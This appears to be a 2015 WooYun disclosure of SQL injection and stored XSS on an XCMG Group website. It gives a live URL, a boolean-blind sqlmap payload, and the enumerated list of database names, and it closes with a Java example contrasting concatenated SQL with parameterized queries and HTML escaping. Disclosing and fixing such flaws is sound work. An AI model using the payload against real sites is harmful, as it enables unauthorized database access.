
Vulnerability summary

Defect ID: wooyun-2015-0108702

Title: Stored XSS & SQL injection on an XCMG Group site

Vendor: XCMG Group (徐工集团)

Author: 小胖纸

Submitted: 2015-04-22 17:33

Fixed: 2015-06-06 17:34

Published: 2015-06-06 17:34

Vulnerability type: network design flaw / logic error

Severity: High

Self-assessed Rank: 20

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]


Vulnerability details

Disclosure status:

2015-04-22: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2015-06-06: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

XCMG (XSS): alert boxes pop up everywhere. Pop. Pop.

Detailed description:

http://success.xcmg.com/detail.jsp?myid=121


GET parameter 'myid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 215 HTTP(s) requests:
---
Parameter: myid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: myid=121 AND 2837=2837
---
[21:25:47] [INFO] testing MySQL
[21:25:47] [WARNING] the back-end DBMS is not MySQL
[21:25:47] [INFO] testing Oracle
[21:25:47] [WARNING] the back-end DBMS is not Oracle
[21:25:47] [INFO] testing PostgreSQL
[21:25:47] [WARNING] the back-end DBMS is not PostgreSQL
[21:25:47] [INFO] testing Microsoft SQL Server
[21:25:47] [INFO] confirming Microsoft SQL Server
[21:25:48] [INFO] the back-end DBMS is Microsoft SQL Server
web application technology: Apache 2.4.4, JSP
back-end DBMS: Microsoft SQL Server 2005
[21:25:48] [INFO] fetching database names
[21:25:48] [INFO] fetching number of databases
[21:25:48] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:25:48] [INFO] retrieved: 55
available databases [55]:
[*] AdventureWorks
[*] AdventureWorksDW
[*] design_common
[*] ebusiness2014
[*] green_leaf
[*] greenbook
[*] huayu
[*] jereh_parts
[*] jereh_parts_general
[*] jerei_shantui_paris
[*] jr_used
[*] jrcms_customers_visitor
[*] jrcms_demo
[*] jrcms_detank
[*] jrcms_johndeere
[*] jrcms_kaiyuan
[*] jrcms_lonking
[*] jrcms_shuangdi
[*] jrcms_xgma
[*] jrnet_xiand_sd
[*] ksc_parts
[*] lg_resource
[*] master
[*] model
[*] msdb
[*] parts_2012
[*] parts_2014
[*] partsSystemNew
[*] server_help
[*] special_2012
[*] special_2013
[*] special_2014
[*] special_2015
[*] special_zyz
[*] tempdb
[*] test_wcm_platform
[*] usa_jereh_crm
[*] used_2012
[*] used_2013
[*] vd_platform
[*] vo_mobie_info
[*] volvo_game_skyroad
[*] volvo_gift_shop
[*] volvo_job
[*] volvo_order
[*] volvo_survey
[*] volvo_trucks
[*] volvo_wlcx
[*] volvoGame
[*] vote
[*] web21sun_used
[*] webdata
[*] xcmg_news
[*] xugongzl
[*] xzgl




Did not go any further.
Hoping for a small excavator as a gift..



The comment box at the bottom of the page!
http://success.xcmg.com/video_detail.jsp?myid=73
Pops up everywhere; not going to test every one.
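The two findings above, an integer `myid` parameter spliced into a query (boolean-based blind injection, the `myid=121 AND 2837=2837` probe) and an unencoded comment body (stored XSS), have the same defensive shape: parameterize on the way in, encode on the way out. The following is an added illustration written for this page and is not the site's code; the class, the `news` table and its columns are hypothetical.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;

// Hypothetical handler for a page like detail.jsp?myid=121 (not the site's code).
public class DetailPage {

    // Vulnerable pattern: the raw query-string value is concatenated into the SQL,
    // so "121 AND 2837=2837" (the probe sqlmap reported above) becomes part of the
    // WHERE clause and the page's true/false behaviour leaks one bit per request.
    static ResultSet lookupUnsafe(Connection db, String myid) throws SQLException {
        Statement st = db.createStatement();
        return st.executeQuery("SELECT title, body FROM news WHERE myid = " + myid);
    }

    // Hardened: validate the type first, then bind it as a parameter. The driver
    // sends the value separately from the SQL text, so it cannot alter the query.
    static ResultSet lookupSafe(Connection db, String myid) throws SQLException {
        int id = parseId(myid); // rejects "121 AND 2837=2837" before any SQL is built
        PreparedStatement ps = db.prepareStatement(
                "SELECT title, body FROM news WHERE myid = ?");
        ps.setInt(1, id);
        return ps.executeQuery();
    }

    // Allow-list the parameter: a short run of digits only.
    static int parseId(String raw) {
        if (raw == null || !raw.matches("\\d{1,9}")) {
            throw new IllegalArgumentException("myid must be a positive integer");
        }
        return Integer.parseInt(raw);
    }

    // Stored XSS fix for the comment box: HTML-encode every user-supplied field at
    // the moment it is written into the page, so a stored <script> renders as text.
    static String htmlEscape(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '&':  out.append("&amp;");  break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }
}
```

`htmlEscape` is for HTML body context only; a value placed inside a JavaScript block or an attribute URL needs the encoder for that context.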

Proof of vulnerability:

The comment box at the bottom of the page!
Pops up everywhere; not going to test every one.

Fix recommendations:

Copyright notice: when reposting, please credit the source: 小胖纸@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused the report.